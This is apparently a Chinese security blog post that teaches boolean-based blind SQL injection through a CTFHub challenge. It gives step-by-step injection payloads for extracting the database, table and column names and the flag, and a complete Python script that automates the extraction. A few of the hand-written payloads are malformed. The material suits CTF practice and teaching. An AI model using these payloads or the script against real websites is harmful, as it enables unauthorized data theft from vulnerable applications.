布尔盲注简介
一、盲注思路
二、盲注原理
1.盲注常用函数
-
substr(str,from,length):返回从下标为from截取长度为length的str子串。其中,首字符下标为1 -
length(str):返回str串长度
2.盲注步骤
穷举、盲猜
(1)爆数据库名长度
?id=1 and length(database())=1#query_error...?id=1 and length(database())=4#query_success#库名长度为4
(2)根据库名长度爆库名
注意观察substr(database,i,1)
i从1开始(第i个字符)
?id=1 and substr(database(),1,1)=‘a’#query_error...?id=1 and substr(database(),1,1)=‘s’#query_success#库名第一个字符是s...?id=1 and substr(database(),4,1)=‘i’#query_success#库名第四个字符是i#库名是sqli
(3)对当前库爆表数量
?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=1#query_error?id=1 and (select COUNT(*) from information_schema.tables where table_schema=database())=2#query_success#当前库sqli有2张表
(4)根据库名和表数量爆表名长度
注意观察limit i,1
i从0开始(第i+1张表)
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=1#query_error...?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=4#query_success#当前库sqli的第一张表表名长度为4...?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 1,1)=4#query_success#当前库sqli的第二张表表名长度为4#当前库sqli有两张表’news’和’flag‘,表名长度均为4
(5)根据表名长度爆表名
注意观察substr((select…limit i,1),j,1)
i从0开始(第i+1张表),j从1开始(第j个字符)
?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’#query_error...?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘n’#query_success#当前库sqli的第一张表表名第一个字符是n...?id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1)=‘g’#query_success#当前库sqli的第二张表表名的第四个字符是g#当前库sqli有两张表’news‘和‘flag’
这里分析一下表名——flag在第二张表flag里面,就不用对表news操作了
(6)对表爆列数量
?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=1#query_error?id=1 and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name=‘flag’)=2#query_success#当前库sqli表flag的列数为2
(7)根据表名和列数量爆列名长度
注意观察limit i,1
i从0开始(第i+1列)
?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=1#query_error...?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=4#query_success#当前库sqli表flag的第一列列名长度为4...?id=1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=4#query_success#当前库sqli表flag的第二列列名长度为4#当前库sqli表flag有两个列‘id’和‘flag’,列名长度为2和4
(8)根据列名长度爆列名
注意观察substr((select…limit i,1),j,1))
i从0开始(第i+1列),j从1开始(第j个字符)
?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘a’#query_error...?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘i’#query_success#当前库sqli表flag的第一列列名第一个字符为i...?id=1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 1,1),4,1)=‘g’#query_success#当前库sqli表flag的第二列列名第四个字符为g#当前库sqli表flag有两个列‘id’和‘flag’
(9)根据列名爆数据
注意观察substr((select…),j,1)
j从1开始(flag的第j个字符)
?id=1 and substr((select flag from sqli.flag),1,1)=“a”#query_error...?id=1 and substr((select flag from sqli.flag),1,1)=“c”#query_success#flag的第一个字符是c...?id=1 and substr((select flag from sqli.flag),i,1)=“}”#query_success#flag的最后一个字符是}#这里的j是计数变量j从1自增1得到的值#出循环即可得到flag
三、脚本自动化盲注
1.Python脚本
脚本使用requests库完成GET请求,基于Python3
#导入库import requests#设定环境URL,由于每次开启环境得到的URL都不同,需要修改!url = 'http://challenge-9e60bb79512ae37b.sandbox.ctfhub.com:10080/'#作为盲注成功的标记,成功页面会显示query_successsuccess_mark = "query_success"#把字母表转化成ascii码的列表,方便便利,需要时再把ascii码通过chr(int)转化成字母ascii_range = range(ord('a'),1+ord('z'))#flag的字符范围列表,包括花括号、a-z,数字0-9str_range = [123,125] + list(ascii_range) + list(range(48,58))#自定义函数获取数据库名长度def getLengthofDatabase():#初始化库名长度为1i = 1#i从1开始,无限循环库名长度while True:new_url = url + "?id=1 and length(database())={}".format(i)#GET请求r = requests.get(new_url)#如果返回的页面有query_success,即盲猜成功即跳出无限循环if success_mark in r.text:#返回最终库名长度return i#如果没有匹配成功,库名长度+1接着循环i = i + 1#自定义函数获取数据库名def getDatabase(length_of_database):#定义存储库名的变量name = ""#库名有多长就循环多少次for i in range(length_of_database):#切片,对每一个字符位遍历字母表#i+1是库名的第i+1个字符下标,j是字符取值a-zfor j in ascii_range:new_url = url + "?id=1 and substr(database(),{},1)='{}'".format(i+1,chr(j))r = requests.get(new_url)if success_mark in r.text:#匹配到就加到库名变量里name += chr(j)#当前下标字符匹配成功,退出遍历,对下一个下标进行遍历字母表break#返回最终的库名return name#自定义函数获取指定库的表数量def getCountofTables(database):#初始化表数量为1i = 1#i从1开始,无限循环while True:new_url = url + "?id=1 and (select count(*) from information_schema.tables where table_schema='{}')={}".format(database,i)r = requests.get(new_url)if success_mark in r.text:#返回最终表数量return i#如果没有匹配成功,表数量+1接着循环i = i + 1#自定义函数获取指定库所有表的表名长度def getLengthListofTables(database,count_of_tables):#定义存储表名长度的列表#使用列表是考虑表数量不为1,多张表的情况length_list=[]#有多少张表就循环多少次for i in range(count_of_tables):#j从1开始,无限循环表名长度j = 1while True:#i+1是第i+1张表new_url = url + "?id=1 and length((select table_name from information_schema.tables where table_schema='{}' limit {},1))={}".format(database,i,j)r = requests.get(new_url)if success_mark in r.text:#匹配到就加到表名长度的列表length_list.append(j)break#如果没有匹配成功,表名长度+1接着循环j = j + 1#返回最终的表名长度的列表return length_list#自定义函数获取指定库所有表的表名def getTables(database,count_of_tables,length_list):#定义存储表名的列表tables=[]#表数量有多少就循环多少次for i in range(count_of_tables):#定义存储表名的变量name = ""#表名有多长就循环多少次#表长度和表序号(i)一一对应for j in range(length_list[i]):#k是字符取值a-zfor k in ascii_range:new_url = url + "?id=1 and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)='{}'".format(database,i,j+1,chr(k))r = requests.get(new_url)if success_mark in r.text:#匹配到就加到表名变量里name = name + chr(k)break#添加表名到表名列表里tables.append(name)#返回最终的表名列表return tables#自定义函数获取指定表的列数量def getCountofColumns(table):#初始化列数量为1i = 1#i从1开始,无限循环while True:new_url = url + "?id=1 and (select count(*) from information_schema.columns where table_name='{}')={}".format(table,i)r = requests.get(new_url)if success_mark in r.text:#返回最终列数量return i#如果没有匹配成功,列数量+1接着循环i = i + 1#自定义函数获取指定库指定表的所有列的列名长度def getLengthListofColumns(database,table,count_of_column):#定义存储列名长度的变量#使用列表是考虑列数量不为1,多个列的情况length_list=[]#有多少列就循环多少次for i in range(count_of_column):#j从1开始,无限循环列名长度j = 1while True:new_url = url + "?id=1 and length((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1))={}".format(database,table,i,j)r = requests.get(new_url)if success_mark in r.text:#匹配到就加到列名长度的列表length_list.append(j)break#如果没有匹配成功,列名长度+1接着循环j = j + 1#返回最终的列名长度的列表return length_list#自定义函数获取指定库指定表的所有列名def getColumns(database,table,count_of_columns,length_list):#定义存储列名的列表columns = []#列数量有多少就循环多少次for i in range(count_of_columns):#定义存储列名的变量name = ""#列名有多长就循环多少次#列长度和列序号(i)一一对应for j in range(length_list[i]):for k in ascii_range:new_url = url + "?id=1 and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'".format(database,table,i,j+1,chr(k))r = requests.get(new_url)if success_mark in r.text:#匹配到就加到列名变量里name = name + chr(k)break#添加列名到列名列表里columns.append(name)#返回最终的列名列表return columns#对指定库指定表指定列爆数据(flag)def getData(database,table,column,str_list):#初始化flag长度为1j = 1#j从1开始,无限循环flag长度while True:#flag中每一个字符的所有可能取值for i in str_list:new_url = url + "?id=1 and substr((select {} from {}.{}),{},1)='{}'".format(column,database,table,j,chr(i))r = requests.get(new_url)#如果返回的页面有query_success,即盲猜成功,跳过余下的for循环if success_mark in r.text:#显示flagprint(chr(i),end="")#flag的终止条件,即flag的尾端右花括号if chr(i) == "}":print()return 1break#如果没有匹配成功,flag长度+1接着循环j = j + 1#--主函数--if __name__ == '__main__':#爆flag的操作#还有仿sqlmap的UI美化print("Judging the number of tables in the database...")database = getDatabase(getLengthofDatabase())count_of_tables = getCountofTables(database)print("[+]There are {} tables in this database".format(count_of_tables))print()print("Getting the table name...")length_list_of_tables = getLengthListofTables(database,count_of_tables)tables = getTables(database,count_of_tables,length_list_of_tables)for i in tables:print("[+]{}".format(i))print("The table names in this database are : {}".format(tables))#选择所要查询的表i = input("Select the table name:")if i not in tables:print("Error!")exit()print()print("Getting the column names in the {} table......".format(i))count_of_columns = getCountofColumns(i)print("[+]There are {} tables in the {} table".format(count_of_columns,i))length_list_of_columns = getLengthListofColumns(database,i,count_of_columns)columns = getColumns(database,i,count_of_columns,length_list_of_columns)print("[+]The column(s) name in {} table is:{}".format(i,columns))#选择所要查询的列j = input("Select the column name:")if j not in columns:print("Error!")exit()print()print("Getting the flag......")print("[+]The flag is ",end="")getData(database,i,j,str_range)
此脚本只针对于本题,可能与其他题目不兼容 由于没有输入检测,输入没有flag的表和列,可能导致运行错误 由于盲猜是依次遍历,可以优化使用random函数或者是二分法改进算法
2.使用截图
添加环境的URL
选择表flag列flag,开始爆flag
爆破结束得到解
历史文章推荐:
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论